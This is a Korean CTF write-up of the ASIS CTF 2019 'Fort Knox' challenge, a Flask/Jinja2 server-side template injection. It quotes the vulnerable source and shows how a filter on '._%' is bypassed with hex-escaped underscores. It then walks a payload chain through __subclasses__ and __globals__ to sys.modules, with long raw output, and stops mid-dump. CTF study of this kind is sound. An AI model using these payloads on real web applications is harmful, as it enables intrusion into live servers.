White Security
Asis CTF 2019 - Fort Knox 풀이 본문
Asia CTF web 2번
Flask SSTI 문제입니다.
접속하면 입력 폼 하나와, 링크 6개가 보이는데
링크는 아직까지도 무슨 의도인지 모르겠습니다.
소스를 보면 주석으로 파이썬 소스가 주어집니다.
소스가 필요할 정도로 어렵지는 않았는데
보너스 문제 같은 느낌이라 준 것 같습니다.
from flask import Flask, session from flask_session import Session from flask import request from flask import render_template from jinja2 import Template import fort Flask.secret_key = fort.SECKEY app = Flask(__name__) app.config['SESSION_TYPE'] = 'filesystem' app.config['TEMPLATES_AUTO_RELOAD'] = True Session(app) @app.route("/") def main(): return render_template("index.html") @app.route("/ask", methods = ["POST"]) def ask(): question = request.form["q"] for c in "._%": if c in question: return render_template("no.html", err = "no " + c) try: t = Template(question) t.globals = {} answer = t.render({ "history": fort.history(), "credit": fort.credit(), "trustworthy": fort.trustworthy() }) except: return render_template("no.html", err = "bad") return render_template("yes.html", answer = answer) @app.route("/door/<door>") def door(door): if fort.trustworthy(): return render_template("flag.html", flag = fort.FLAG) doorNum = 0 if door is not None: doorNum = int(door) if doorNum > 0 and doorNum < 7: fort.visit(doorNum) return render_template("door.html", door = doorNum) return render_template("no.html", err = "Door not found!")
q를 입력인자로 받고 '._%' 문자를 필터링 하고 있습니다.
그러나 파이썬 문법상 모두 우회할 수 있습니다.
7*7 49 []['\x5f\x5fclass\x5f\x5f'] <type 'list'> []['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f'] <type 'object'> []['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubclasses\x5f\x5f']() [<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, <type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <type 'uwsgi._Input'>, <type 'uwsgi.SymbolsImporter'>, <type 'uwsgi.ZipImporter'>, <type 'uwsgi.SymbolsZipImporter'>, <type 'operator.itemgetter'>, <type 'operator.attrgetter'>, <type 'operator.methodcaller'>, <type 'functools.partial'>, <type 'itertools.combinations'>, <type 'itertools.combinations_with_replacement'>, <type 'itertools.cycle'>, <type 'itertools.dropwhile'>, <type 'itertools.takewhile'>, <type 'itertools.islice'>, <type 'itertools.starmap'>, <type 'itertools.imap'>, <type 'itertools.chain'>, <type 'itertools.compress'>, <type 'itertools.ifilter'>, <type 'itertools.ifilterfalse'>, <type 'itertools.count'>, <type 'itertools.izip'>, <type 'itertools.izip_longest'>, <type 'itertools.permutations'>, <type 'itertools.product'>, <type 'itertools.repeat'>, <type 'itertools.groupby'>, <type 'itertools.tee_dataobject'>, <type 'itertools.tee'>, <type 'itertools._grouper'>, <type 'cStringIO.StringO'>, <type 'cStringIO.StringI'>, <class 'string.Template'>, <class 'string.Formatter'>, <type 'collections.deque'>, <type 'deque_iterator'>, <type 'deque_reverse_iterator'>, <type '_thread._localdummy'>, <type 'thread._local'>, <type 'thread.lock'>, <type 'datetime.date'>, <type 'datetime.timedelta'>, <type 'datetime.time'>, <type 'datetime.tzinfo'>, <class 'werkzeug._internal._Missing'>, <class 'werkzeug._internal._DictAccessorProperty'>, <type 'time.struct_time'>, <class 'email.LazyImporter'>, <type 'Struct'>, <type '_hashlib.HASH'>, <type '_random.Random'>, <type '_ssl._SSLContext'>, <type '_ssl._SSLSocket'>, <class 'socket._closedsocket'>, <type '_socket.socket'>, <type 'method_descriptor'>, <class 'socket._socketobject'>, <class 'socket._fileobject'>, <class 'urlparse.ResultMixin'>, <class 'contextlib.GeneratorContextManager'>, <class 'contextlib.closing'>, <class 'calendar.Calendar'>, <type '_io._IOBase'>, <type '_io.IncrementalNewlineDecoder'>, <class 'werkzeug.datastructures.ImmutableListMixin'>, <class 'werkzeug.datastructures.ImmutableDictMixin'>, <class 'werkzeug.datastructures.UpdateDictMixin'>, <class 'werkzeug.datastructures.ViewItems'>, <class 'werkzeug.datastructures._omd_bucket'>, <class 'werkzeug.datastructures.Headers'>, <class 'werkzeug.datastructures.ImmutableHeadersMixin'>, <class 'werkzeug.datastructures.IfRange'>, <class 'werkzeug.datastructures.Range'>, <class 'werkzeug.datastructures.ContentRange'>, <class 'werkzeug.datastructures.FileStorage'>, <class 'werkzeug.urls.Href'>, <class 'werkzeug.wsgi.ProxyMiddleware'>, <class 'werkzeug.wsgi.SharedDataMiddleware'>, <class 'werkzeug.wsgi.DispatcherMiddleware'>, <class 'werkzeug.wsgi.ClosingIterator'>, <class 'werkzeug.wsgi.FileWrapper'>, <class 'werkzeug.wsgi._RangeWrapper'>, <class 'werkzeug.formparser.FormDataParser'>, <class 'werkzeug.formparser.MultiPartParser'>, <class 'werkzeug.utils.HTMLBuilder'>, <class 'werkzeug.wrappers.BaseRequest'>, <class 'werkzeug.wrappers.BaseResponse'>, <class 'werkzeug.wrappers.AcceptMixin'>, <class 'werkzeug.wrappers.ETagRequestMixin'>, <class 'werkzeug.wrappers.UserAgentMixin'>, <class 'werkzeug.wrappers.AuthorizationMixin'>, <class 'werkzeug.wrappers.StreamOnlyMixin'>, <class 'werkzeug.wrappers.ETagResponseMixin'>, <class 'werkzeug.wrappers.ResponseStream'>, <class 'werkzeug.wrappers.ResponseStreamMixin'>, <class 'werkzeug.wrappers.CommonRequestDescriptorsMixin'>, <class 'werkzeug.wrappers.CommonResponseDescriptorsMixin'>, <class 'werkzeug.wrappers.WWWAuthenticateMixin'>, <class 'werkzeug.exceptions.Aborter'>, <type '_json.Scanner'>, <type '_json.Encoder'>, <class 'json.decoder.JSONDecoder'>, <class 'json.encoder.JSONEncoder'>, <class 'threading._Verbose'>, <type 'cPickle.Unpickler'>, <type 'cPickle.Pickler'>, <class 'jinja2.utils.MissingType'>, <class 'jinja2.utils.LRUCache'>, <class 'jinja2.utils.Cycler'>, <class 'jinja2.utils.Joiner'>, <class 'jinja2.utils.Namespace'>, <class 'markupsafe._MarkupEscapeHelper'>, <class 'jinja2.nodes.EvalContext'>, <class 'jinja2.runtime.TemplateReference'>, <class 'jinja2.nodes.Node'>, <class 'numbers.Number'>, <class 'jinja2.runtime.Context'>, <class 'jinja2.runtime.BlockReference'>, <class 'jinja2.runtime.LoopContextBase'>, <class 'jinja2.runtime.LoopContextIterator'>, <class 'jinja2.runtime.Macro'>, <class 'jinja2.runtime.Undefined'>, <class 'decimal.Decimal'>, <class 'decimal._ContextManager'>, <class 'decimal.Context'>, <class 'decimal._WorkRep'>, <class 'decimal._Log10Memoize'>, <type '_ast.AST'>, <class 'jinja2.lexer.Failure'>, <class 'jinja2.lexer.TokenStreamIterator'>, <class 'jinja2.lexer.TokenStream'>, <class 'jinja2.lexer.Lexer'>, <class 'jinja2.parser.Parser'>, <class 'jinja2.visitor.NodeVisitor'>, <class 'jinja2.idtracking.Symbols'>, <class 'jinja2.compiler.MacroRef'>, <class 'jinja2.compiler.Frame'>, <class 'jinja2.environment.Environment'>, <class 'jinja2.environment.Template'>, <class 'jinja2.environment.TemplateModule'>, <class 'jinja2.environment.TemplateExpression'>, <class 'jinja2.environment.TemplateStream'>, <class 'jinja2.loaders.BaseLoader'>, <class 'jinja2.bccache.Bucket'>, <class 'jinja2.bccache.BytecodeCache'>, <class 'difflib.HtmlDiff'>, <class 'uuid.UUID'>, <type 'CArgObject'>, <type '_ctypes.CThunkObject'>, <type '_ctypes._CData'>, <type '_ctypes.CField'>, <type '_ctypes.DictRemover'>, <class 'ctypes.CDLL'>, <class 'ctypes.LibraryLoader'>, <type 'select.epoll'>, <class 'subprocess.Popen'>, <class 'werkzeug.routing.RuleFactory'>, <class 'werkzeug.routing.RuleTemplate'>, <class 'werkzeug.routing.BaseConverter'>, <class 'werkzeug.routing.Map'>, <class 'werkzeug.routing.MapAdapter'>, <class 'ast.NodeVisitor'>, <class 'click._compat._FixupStream'>, <class 'click._compat._AtomicFile'>, <class 'click.utils.LazyFile'>, <class 'click.utils.KeepOpenFile'>, <class 'click.utils.PacifyFlushWrapper'>, <class 'click.types.ParamType'>, <class 'click.parser.Option'>, <class 'click.parser.Argument'>, <class 'click.parser.ParsingState'>, <class 'click.parser.OptionParser'>, <class 'click.formatting.HelpFormatter'>, <class 'click.core.Context'>, <class 'click.core.BaseCommand'>, <class 'click.core.Parameter'>, <class 'werkzeug.local.Local'>, <class 'werkzeug.local.LocalStack'>, <class 'werkzeug.local.LocalManager'>, <class 'werkzeug.local.LocalProxy'>, <class 'flask.signals.Namespace'>, <class 'flask.signals._FakeSignal'>, <class 'flask.helpers.locked_cached_property'>, <class 'flask.helpers._PackageBoundObject'>, <class 'flask.cli.DispatchingApp'>, <class 'flask.cli.ScriptInfo'>, <class 'itsdangerous._json._CompactJSON'>, <class 'itsdangerous.signer.SigningAlgorithm'>, <class 'itsdangerous.signer.Signer'>, <class 'itsdangerous.serializer.Serializer'>, <class 'itsdangerous.url_safe.URLSafeSerializerMixin'>, <class 'flask.config.ConfigAttribute'>, <class 'flask.ctx._AppCtxGlobals'>, <class 'flask.ctx.AppContext'>, <class 'flask.ctx.RequestContext'>, <class 'logging.LogRecord'>, <class 'logging.Formatter'>, <class 'logging.BufferingFormatter'>, <class 'logging.Filter'>, <class 'logging.Filterer'>, <class 'logging.PlaceHolder'>, <class 'logging.Manager'>, <class 'logging.LoggerAdapter'>, <class 'flask.json.tag.JSONTag'>, <class 'flask.json.tag.TaggedJSONSerializer'>, <class 'flask.sessions.SessionInterface'>, <class 'flask.wrappers.JSONMixin'>, <class 'flask.blueprints.BlueprintSetupState'>, <class 'flask_session.Session'>, <class 'werkzeug.contrib.cache.BaseCache'>, <class 'jinja2.debug.TracebackFrameProxy'>, <class 'jinja2.ext.Extension'>, <class 'jinja2.ext._CommentFinder'>, <class 'jinja2.debug.ProcessedTraceback'>, <class 'werkzeug.test._TestCookieHeaders'>, <class 'werkzeug.test._TestCookieResponse'>, <class 'werkzeug.test.EnvironBuilder'>, <class 'werkzeug.test.Client'>, <type 'method-wrapper'>, <type 'tupleiterator'>] []['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubclasses\x5f\x5f']()['\x5f\x5finit\x5f\x5f'] <method-wrapper '__init__' of list object at 0x7f59d5c44d88> []['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubclasses\x5f\x5f']()[59] <class 'warnings.catch_warnings'> []['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f'] <unbound method catch_warnings.__init__> []['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f'] {'filterwarnings': <function filterwarnings at 0x7f59df7cdaa0>, 'once_registry': {}, 'WarningMessage': <class 'warnings.WarningMessage'>, '_show_warning': <function _show_warning at 0x7f59df7cda28>, 'filters': [('ignore', <_sre.SRE_Pattern object at 0x7f59d721f618>, <type 'exceptions.DeprecationWarning'>, <_sre.SRE_Pattern object at 0x7f59d6f94450>, 0), ('ignore', None, <type 'exceptions.DeprecationWarning'>, None, 0), ('ignore', None, <type 'exceptions.PendingDeprecationWarning'>, None, 0), ('ignore', None, <type 'exceptions.ImportWarning'>, None, 0), ('ignore', None, <type 'exceptions.BytesWarning'>, None, 0)], '_setoption': <function _setoption at 0x7f59df7cdcf8>, 'showwarning': <function _show_warning at 0x7f59df7cda28>, '__all__': ['warn', 'warn_explicit', 'showwarning', 'formatwarning', 'filterwarnings', 'simplefilter', 'resetwarnings', 'catch_warnings'], 'onceregistry': {}, '__package__': None, 'simplefilter': <function simplefilter at 0x7f59df7cdb90>, 'default_action': 'default', '_getcategory': <function _getcategory at 0x7f59df7cdde8>, '__builtins__': {'bytearray': <type 'bytearray'>, 'IndexError': <type 'exceptions.IndexError'>, 'all': <built-in function all>, 'help': Type help() for interactive help, or help(object) for help about object., 'vars': <built-in function vars>, 'SyntaxError': <type 'exceptions.SyntaxError'>, 'unicode': <type 'unicode'>, 'UnicodeDecodeError': <type 'exceptions.UnicodeDecodeError'>, 'memoryview': <type 'memoryview'>, 'isinstance': <built-in function isinstance>, 'copyright': Copyright (c) 2001-2018 Python Software Foundation. All Rights Reserved. Copyright (c) 2000 BeOpen.com. All Rights Reserved. Copyright (c) 1995-2001 Corporation for National Research Initiatives. All Rights Reserved. Copyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam. All Rights Reserved., 'NameError': <type 'exceptions.NameError'>, 'BytesWarning': <type 'exceptions.BytesWarning'>, 'dict': <type 'dict'>, 'input': <built-in function input>, 'oct': <built-in function oct>, 'bin': <built-in function bin>, 'SystemExit': <type 'exceptions.SystemExit'>, 'StandardError': <type 'exceptions.StandardError'>, 'format': <built-in function format>, 'repr': <built-in function repr>, 'sorted': <built-in function sorted>, 'False': False, 'RuntimeWarning': <type 'exceptions.RuntimeWarning'>, 'list': <type 'list'>, 'iter': <built-in function iter>, 'reload': <built-in function reload>, 'Warning': <type 'exceptions.Warning'>, '__package__': None, 'round': <built-in function round>, 'dir': <built-in function dir>, 'cmp': <built-in function cmp>, 'set': <type 'set'>, 'bytes': <type 'str'>, 'reduce': <built-in function reduce>, 'intern': <built-in function intern>, 'issubclass': <built-in function issubclass>, 'Ellipsis': Ellipsis, 'EOFError': <type 'exceptions.EOFError'>, 'locals': <built-in function locals>, 'BufferError': <type 'exceptions.BufferError'>, 'slice': <type 'slice'>, 'FloatingPointError': <type 'exceptions.FloatingPointError'>, 'sum': <built-in function sum>, 'getattr': <built-in function getattr>, 'abs': <built-in function abs>, 'exit': Use exit() or Ctrl-D (i.e. EOF) to exit, 'print': <built-in function print>, 'True': True, 'FutureWarning': <type 'exceptions.FutureWarning'>, 'ImportWarning': <type 'exceptions.ImportWarning'>, 'None': None, 'hash': <built-in function hash>, 'ReferenceError': <type 'exceptions.ReferenceError'>, 'len': <built-in function len>, 'credits': Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands for supporting Python development. See www.python.org for more information., 'frozenset': <type 'frozenset'>, '__name__': '__builtin__', 'ord': <built-in function ord>, 'super': <type 'super'>, 'TypeError': <type 'exceptions.TypeError'>, 'license': Type license() to see the full license text, 'KeyboardInterrupt': <type 'exceptions.KeyboardInterrupt'>, 'UserWarning': <type 'exceptions.UserWarning'>, 'filter': <built-in function filter>, 'range': <built-in function range>, 'staticmethod': <type 'staticmethod'>, 'SystemError': <type 'exceptions.SystemError'>, 'BaseException': <type 'exceptions.BaseException'>, 'pow': <built-in function pow>, 'RuntimeError': <type 'exceptions.RuntimeError'>, 'float': <type 'float'>, 'MemoryError': <type 'exceptions.MemoryError'>, 'StopIteration': <type 'exceptions.StopIteration'>, 'globals': <built-in function globals>, 'divmod': <built-in function divmod>, 'enumerate': <type 'enumerate'>, 'apply': <built-in function apply>, 'LookupError': <type 'exceptions.LookupError'>, 'open': <built-in function open>, 'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 'basestring': <type 'basestring'>, 'UnicodeError': <type 'exceptions.UnicodeError'>, 'zip': <built-in function zip>, 'hex': <built-in function hex>, 'long': <type 'long'>, 'next': <built-in function next>, 'ImportError': <type 'exceptions.ImportError'>, 'chr': <built-in function chr>, 'xrange': <type 'xrange'>, 'type': <type 'type'>, '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", 'Exception': <type 'exceptions.Exception'>, 'tuple': <type 'tuple'>, 'UnicodeTranslateError': <type 'exceptions.UnicodeTranslateError'>, 'reversed': <type 'reversed'>, 'UnicodeEncodeError': <type 'exceptions.UnicodeEncodeError'>, 'IOError': <type 'exceptions.IOError'>, 'hasattr': <built-in function hasattr>, 'delattr': <built-in function delattr>, 'setattr': <built-in function setattr>, 'raw_input': <built-in function raw_input>, 'SyntaxWarning': <type 'exceptions.SyntaxWarning'>, 'compile': <built-in function compile>, 'ArithmeticError': <type 'exceptions.ArithmeticError'>, 'str': <type 'str'>, 'property': <type 'property'>, 'GeneratorExit': <type 'exceptions.GeneratorExit'>, 'int': <type 'int'>, '__import__': <built-in function __import__>, 'KeyError': <type 'exceptions.KeyError'>, 'coerce': <built-in function coerce>, 'PendingDeprecationWarning': <type 'exceptions.PendingDeprecationWarning'>, 'file': <type 'file'>, 'EnvironmentError': <type 'exceptions.EnvironmentError'>, 'unichr': <built-in function unichr>, 'id': <built-in function id>, 'OSError': <type 'exceptions.OSError'>, 'DeprecationWarning': <type 'exceptions.DeprecationWarning'>, 'min': <built-in function min>, 'UnicodeWarning': <type 'exceptions.UnicodeWarning'>, 'execfile': <built-in function execfile>, 'any': <built-in function any>, 'complex': <type 'complex'>, 'bool': <type 'bool'>, 'ValueError': <type 'exceptions.ValueError'>, 'NotImplemented': NotImplemented, 'map': <built-in function map>, 'buffer': <type 'buffer'>, 'max': <built-in function max>, 'object': <type 'object'>, 'TabError': <type 'exceptions.TabError'>, 'callable': <built-in function callable>, 'ZeroDivisionError': <type 'exceptions.ZeroDivisionError'>, 'eval': <built-in function eval>, '__debug__': True, 'IndentationError': <type 'exceptions.IndentationError'>, 'AssertionError': <type 'exceptions.AssertionError'>, 'classmethod': <type 'classmethod'>, 'UnboundLocalError': <type 'exceptions.UnboundLocalError'>, 'NotImplementedError': <type 'exceptions.NotImplementedError'>, 'AttributeError': <type 'exceptions.AttributeError'>, 'OverflowError': <type 'exceptions.OverflowError'>}, 'catch_warnings': <class 'warnings.catch_warnings'>, '__file__': '/usr/local/lib/python2.7/warnings.pyc', 'warnpy3k': <function warnpy3k at 0x7f59df7cdb18>, 'sys': <module 'sys' (built-in)>, '__name__': 'warnings', 'warn_explicit': <built-in function warn_explicit>, 'types': <module 'types' from '/usr/local/lib/python2.7/types.pyc'>, 'warn': <built-in function warn>, '_processoptions': <function _processoptions at 0x7f59df7cdc80>, 'defaultaction': 'default', '__doc__': 'Python part of the warnings subsystem.', 'linecache': <module 'linecache' from '/usr/local/lib/python2.7/linecache.pyc'>, '_OptionError': <class 'warnings._OptionError'>, 'resetwarnings': <function resetwarnings at 0x7f59df7cdc08>, 'formatwarning': <function formatwarning at 0x7f59df7cd9b0>, '_getaction': <function _getaction at 0x7f59df7cdd70>} []['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f']['sys'] <module 'sys' (built-in)> []['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f']['sys']['modules'] {'flask.collections': None, 'flask.time': None, 'ctypes.os': None, 'flask.logging': <module 'flask.logging' from '/usr/local/lib/python2.7/site-packages/flask/logging.pyc'>, 'jinja2.cPickle': None, 'gc': <module 'gc' (built-in)>, 'jinja2.collections': None, 'jinja2.tests': <module 'jinja2.tests' from '/usr/local/lib/python2.7/site-packages/jinja2/tests.pyc'>, 'flask_session.flask': None, 'logging.weakref': None, 'flask': <module 'flask' from '/usr/local/lib/python2.7/site-packages/flask/__init__.pyc'>, 'flask.flask': None, 'pprint': <module 'pprint' from '/usr/local/lib/python2.7/pprint.pyc'>, 'email.MIMENonMultipart': <email.LazyImporter object at 0x7f59d8f220d0>, 'werkzeug.posixemulation': <module 'werkzeug.posixemulation' from '/usr/local/lib/python2.7/site-packages/werkzeug/posixemulation.pyc'>, 'string': <module 'string' from '/usr/local/lib/python2.7/string.pyc'>, 'encodings.utf_8': <module 'encodings.utf_8' from '/usr/local/lib/python2.7/encodings/utf_8.pyc'>, 'markupsafe': <module 'markupsafe' from '/usr/local/lib/python2.7/site-packages/markupsafe/__init__.pyc'>, 'json.encoder': <module 'json.encoder' from '/usr/local/lib/python2.7/json/encoder.pyc'>, 'subprocess': <module 'subprocess' from '/usr/local/lib/python2.7/subprocess.pyc'>, '_ast': <module '_ast' (built-in)>, 'werkzeug.types': None, 'jinja2.traceback': None, 'uwsgi': <module 'uwsgi' (built-in)>, 'jinja2.exceptions': <module 'jinja2.exceptions' from '/usr/local/lib/python2.7/site-packages/jinja2/exceptions.pyc'>, 'dis': <module 'dis' from '/usr/local/lib/python2.7/dis.pyc'>, 'logging.threading': None, 'flask.mimetypes': None, 'jinja2.parser': <module 'jinja2.parser' from '/usr/local/lib/python2.7/site-packages/jinja2/parser.pyc'>, 'werkzeug.errno': None, 'flask_session.time': None, 'flask.json.codecs': None, 'jinja2.errno': None, 'flask.unicodedata': None, 'click': <module 'click' from '/usr/local/lib/python2.7/site-packages/click/__init__.pyc'>, 'jinja2.sys': None, 'abc': <module 'abc' from '/usr/local/lib/python2.7/abc.pyc'>, 'jinja2.defaults': <module 'jinja2.defaults' from '/usr/local/lib/python2.7/site-packages/jinja2/defaults.pyc'>, 'flask.globals': <module 'flask.globals' from '/usr/local/lib/python2.7/site-packages/flask/globals.pyc'>, 'click.parser': <module 'click.parser' from '/usr/local/lib/python2.7/site-packages/click/parser.pyc'>, 'werkzeug.wrappers': <module 'werkzeug.wrappers' from '/usr/local/lib/python2.7/site-packages/werkzeug/wrappers.pyc'>, 'jinja2.markupsafe': None, 'ctypes.tempfile': None, '_ctypes': <module '_ctypes' from '/usr/local/lib/python2.7/lib-dynload/_ctypes.so'>, 'exceptions': <module 'exceptions' (built-in)>, 'json.scanner': <module 'json.scanner' from '/usr/local/lib/python2.7/json/scanner.pyc'>, 'codecs': <module 'codecs' from '/usr/local/lib/python2.7/codecs.pyc'>, 'jinja2.lexer': <module 'jinja2.lexer' from '/usr/local/lib/python2.7/site-packages/jinja2/lexer.pyc'>, 'flask_session.uuid': None, 'click.errno': None, 'StringIO': <module 'StringIO' from '/usr/local/lib/python2.7/StringIO.pyc'>, 'weakref': <module 'weakref' from '/usr/local/lib/python2.7/weakref.pyc'>, 'itsdangerous.signer': <module 'itsdangerous.signer' from '/usr/local/lib/python2.7/site-packages/itsdangerous/signer.pyc'>, 'werkzeug.contrib.re': None, 'jinja2.threading': None, 'flask_session': <module 'flask_session' from '/usr/local/lib/python2.7/site-packages/flask_session/__init__.pyc'>, 'base64': <module 'base64' from '/usr/local/lib/python2.7/base64.pyc'>, '_sre': <module '_sre' (built-in)>, 'itsdangerous.numbers': None, 'email.FeedParser': <email.LazyImporter object at 0x7f59d8f12cd0>, 'logging.sys': None, 'flask.zlib': None, 'werkzeug.pkgutil': None, 'ctypes._ctypes': None, '_heapq': <module '_heapq' from '/usr/local/lib/python2.7/lib-dynload/_heapq.so'>, 'werkzeug.base64': None, 'jinja2.jinja2': None, 'werkzeug.hashlib': None, 'click.os': None, 'werkzeug.datastructures': <module 'werkzeug.datastructures' from '/usr/local/lib/python2.7/site-packages/werkzeug/datastructures.pyc'>, 'email.MIMEMessage': <email.LazyImporter object at 0x7f59d8f12fd0>, 'email._parseaddr': <module 'email._parseaddr' from '/usr/local/lib/python2.7/email/_parseaddr.pyc'>, 'email.sys': None, 'tokenize': <module 'tokenize' from '/usr/local/lib/python2.7/tokenize.pyc'>, 'werkzeug.threading': None, 'logging.thread': None, 'jinja2.weakref': None, 'cPickle': <module 'cPickle' from '/usr/local/lib/python2.7/lib-dynload/cPickle.so'>, 'markupsafe.re': None, 'jinja2.tempfile': None, 'click.codecs': None, 'click._unicodefun': <module 'click._unicodefun' from '/usr/local/lib/python2.7/site-packages/click/_unicodefun.pyc'>, 'click.inspect': None, 'unicodedata': <module 'unicodedata' from '/usr/local/lib/python2.7/lib-dynload/unicodedata.so'>, 'thread': <module 'thread' (built-in)>, 'flask.json.uuid': None, 'flask_session.os': None, '_bisect': <module '_bisect' from '/usr/local/lib/python2.7/lib-dynload/_bisect.so'>, 'click.globals': <module 'click.globals' from '/usr/local/lib/python2.7/site-packages/click/globals.pyc'>, 'encodings.aliases': <module 'encodings.aliases' from '/usr/local/lib/python2.7/encodings/aliases.pyc'>, 'fnmatch': <module 'fnmatch' from '/usr/local/lib/python2.7/fnmatch.pyc'>, 'sre_parse': <module 'sre_parse' from '/usr/local/lib/python2.7/sre_parse.pyc'>, 'pickle': <module 'pickle' from '/usr/local/lib/python2.7/pickle.pyc'>, 'logging.cStringIO': None, 'itsdangerous.exc': <module 'itsdangerous.exc' from '/usr/local/lib/python2.7/site-packages/itsdangerous/exc.pyc'>, 'click.sys': None, 'numbers': <module 'numbers' from '/usr/local/lib/python2.7/numbers.pyc'>, 'flask.json.io': None, 'jinja2.utils': <module 'jinja2.utils' from '/usr/local/lib/python2.7/site-packages/jinja2/utils.pyc'>, 'email.Header': <email.LazyImporter object at 0x7f59d8f12d50>, 'email.MIMEBase': <email.LazyImporter object at 0x7f59d8f12f50>, 'strop': <module 'strop' from '/usr/local/lib/python2.7/lib-dynload/strop.so'>, 'flask._compat': <module 'flask._compat' from '/usr/local/lib/python2.7/site-packages/flask/_compat.pyc'>, 'ctypes.util': <module 'ctypes.util' from '/usr/local/lib/python2.7/ctypes/util.pyc'>, 'click.exceptions': <module 'click.exceptions' from '/usr/local/lib/python2.7/site-packages/click/exceptions.pyc'>, 'flask.inspect': None, 'htmlentitydefs': <module 'htmlentitydefs' from '/usr/local/lib/python2.7/htmlentitydefs.pyc'>, 'werkzeug.thread': None, 'os.path': <module 'posixpath' from '/usr/local/lib/python2.7/posixpath.pyc'>, 'flask.ssl': None, 'werkzeug.routing': <module 'werkzeug.routing' from '/usr/local/lib/python2.7/site-packages/werkzeug/routing.pyc'>, 'click.__future__': None, 'werkzeug.formparser': <module 'werkzeug.formparser' from '/usr/local/lib/python2.7/site-packages/werkzeug/formparser.pyc'>, '_weakrefset': <module '_weakrefset' from '/usr/local/lib/python2.7/_weakrefset.pyc'>, 'werkzeug.operator': None, 'jinja2.debug': <module 'jinja2.debug' from '/usr/local/lib/python2.7/site-packages/jinja2/debug.pyc'>, 'functools': <module 'functools' from '/usr/local/lib/python2.7/functools.pyc'>, 'ctypes.re': None, 'sysconfig': <module 'sysconfig' from '/usr/local/lib/python2.7/sysconfig.pyc'>, 'email.MIMEImage': <email.LazyImporter object at 0x7f59d8f12f90>, 'jinja2.json': None, 'email.MIMEText': <email.LazyImporter object at 0x7f59d8f22190>, 'flask_session.cPickle': None, 'uuid': <module 'uuid' from '/usr/local/lib/python2.7/uuid.pyc'>, 'itsdangerous._json': <module 'itsdangerous._json' from '/usr/local/lib/python2.7/site-packages/itsdangerous/_json.pyc'>, 'tempfile': <module 'tempfile' from '/usr/local/lib/python2.7/tempfile.pyc'>, 'imp': <module 'imp' (built-in)>, 'werkzeug.http': <module 'werkzeug.http' from '/usr/local/lib/python2.7/site-packages/werkzeug/http.pyc'>, 'main': <module 'main' from './main.pyc'>, 'flask.json.jinja2': None, 'jinja2': <module 'jinja2' from '/usr/local/lib/python2.7/site-packages/jinja2/__init__.pyc'>, 'itsdangerous.sys': None, 'werkzeug._compat': <module 'werkzeug._compat' from '/usr/local/lib/python2.7/site-packages/werkzeug/_compat.pyc'>, 'email.urllib': None, 'werkzeug.urllib': None, 'click.fcntl': None, 'werkzeug.contrib.cache': <module 'werkzeug.contrib.cache' from '/usr/local/lib/python2.7/site-packages/werkzeug/contrib/cache.pyc'>, 'httplib': <module 'httplib' from '/usr/local/lib/python2.7/httplib.pyc'>, 'decimal': <module 'decimal' from '/usr/local/lib/python2.7/decimal.pyc'>, 'flask.json.tag': <module 'flask.json.tag' from '/usr/local/lib/python2.7/site-packages/flask/json/tag.pyc'>, 'token': <module 'token' from '/usr/local/lib/python2.7/token.pyc'>, 'email.encoders': <module 'email.encoders' from '/usr/local/lib/python2.7/email/encoders.pyc'>, 'werkzeug.difflib': None, 'cStringIO': <module 'cStringIO' from '/usr/local/lib/python2.7/lib-dynload/cStringIO.so'>, 'werkzeug.re': None, 'flask.ast': None, 